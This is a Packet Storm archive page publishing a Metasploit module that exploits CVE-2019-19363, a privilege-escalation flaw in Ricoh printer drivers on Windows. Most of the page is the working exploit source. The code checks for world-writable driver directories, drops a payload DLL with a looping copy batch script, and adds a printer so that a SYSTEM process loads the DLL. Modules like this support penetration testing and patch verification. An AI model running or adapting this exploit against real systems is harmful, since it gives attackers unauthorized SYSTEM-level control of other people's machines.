exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Ricoh Driver Privilege Escalation

Ricoh Driver Privilege Escalation
Posted Feb 7, 2020
Authored by Shelby Pace, Alexander Pudwill, Pentagrid AG | Site metasploit.com

This Metasploit module leverages the prnmngr.vbs script to add and delete printers. Multiple runs of this module may be required given successful exploitation is time-sensitive.

tags | exploit
advisories | CVE-2019-19363
SHA-256 | 7c9e552f55f234acffef8a364bb1a7d1ff7a39989cb75b1ba2f3f44e92de5981

Ricoh Driver Privilege Escalation

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/exe'

class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking

include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Post::Windows::Priv
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Ricoh Driver Privilege Escalation',
'Description' => %q(
Various Ricoh printer drivers allow escalation of
privileges on Windows systems.

For vulnerable drivers, a low-privileged user can
read/write files within the `RICOH_DRV` directory
and its subdirectories.

`PrintIsolationHost.exe`, a Windows process running
as NT AUTHORITY\SYSTEM, loads driver-specific DLLs
during the installation of a printer. A user can
elevate to SYSTEM by writing a malicious DLL to
the vulnerable driver directory and adding a new
printer with a vulnerable driver.

This module leverages the `prnmngr.vbs` script
to add and delete printers. Multiple runs of this
module may be required given successful exploitation
is time-sensitive.
),
'License' => MSF_LICENSE,
'Author' => [
'Alexander Pudwill', # discovery & PoC
'Pentagrid AG', # PoC
'Shelby Pace' # msf module
],
'References' =>
[
[ 'CVE', '2019-19363'],
[ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Platform' => 'win',
'Payload' =>
{
},
'SessionTypes' => [ 'meterpreter' ],
'Targets' =>
[[
'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }
]],
'Notes' =>
{
'SideEffects' => [ ARTIFACTS_ON_DISK ],
'Reliability' => [ UNRELIABLE_SESSION ],
'Stability' => [ SERVICE_RESOURCE_LOSS ]
},
'DisclosureDate' => "Jan 22 2020",
'DefaultTarget' => 0
))

self.needs_cleanup = true

register_advanced_options([
OptBool.new('ForceExploit', [ false, 'Override check result', false ])
])
end

def check
dir_name = "C:\\ProgramData\\RICOH_DRV"

return CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name)
driver_names = dir(dir_name)

return CheckCode::Detected("Detected Ricoh driver directory, but no installed drivers") unless driver_names.length

vulnerable = false
driver_names.each do |driver_name|
full_path = "#{dir_name}\\#{driver_name}\\_common\\dlz"
next unless directory?(full_path)
@driver_path = full_path

res = cmd_exec("icacls \"#{@driver_path}\"")
next unless res.include?('Everyone:')
next unless res.match(/\(F\)/)

vulnerable = true
break
end

return CheckCode::Detected('Ricoh driver directory does not have full permissions') unless vulnerable

vprint_status("Vulnerable driver directory: #{@driver_path}")
CheckCode::Appears('Ricoh driver directory has full permissions')
end

def add_printer(driver_name)
fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)

dll_data = generate_payload_dll
dll_path = "#{@driver_path}\\headerfooter.dll"

temp_path = expand_path('%TEMP%\\headerfooter.dll')
vprint_status("Writing dll to #{temp_path}")

bat_file_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(5..9)}.bat")
cp_cmd = "copy /y \"#{temp_path}\" \"#{dll_path}\""
bat_file = <<~HEREDOC
:repeat
#{cp_cmd} && goto :repeat
HEREDOC

write_file(bat_file_path, bat_file)
write_file(temp_path, dll_data)
register_files_for_cleanup(bat_file_path, temp_path)

script_cmd = "cscript \"#{@script_path}\" -a -p \"#{@printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\""
bat_cmd = "cmd.exe /c \"#{bat_file_path}\""
print_status("Adding printer #{@printer_name}...")
client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })
vprint_status("Executing script...")
cmd_exec(bat_cmd)
rescue Rex::Post::Meterpreter::RequestError => e
e_log("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
end

def exploit
fail_with(Failure::None, 'Already running as SYSTEM') if is_system?

fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'

if sysinfo['Architecture'] != payload.arch.first
fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver')
end

@driver_path = ''
unless check == CheckCode::Appears || datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override')
end

@printer_name = Rex::Text.rand_text_alpha(5..9)
@script_path = "C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs"
drvr_name = @driver_path.split('\\')
drvr_name_idx = drvr_name.index('RICOH_DRV') + 1
drvr_name = drvr_name[drvr_name_idx]

add_printer(drvr_name)
end

def cleanup
print_status("Deleting printer #{@printer_name}")
Rex.sleep(3)
delete_cmd = "cscript \"#{@script_path}\" -d -p \"#{@printer_name}\""
client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true })
end
end
Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close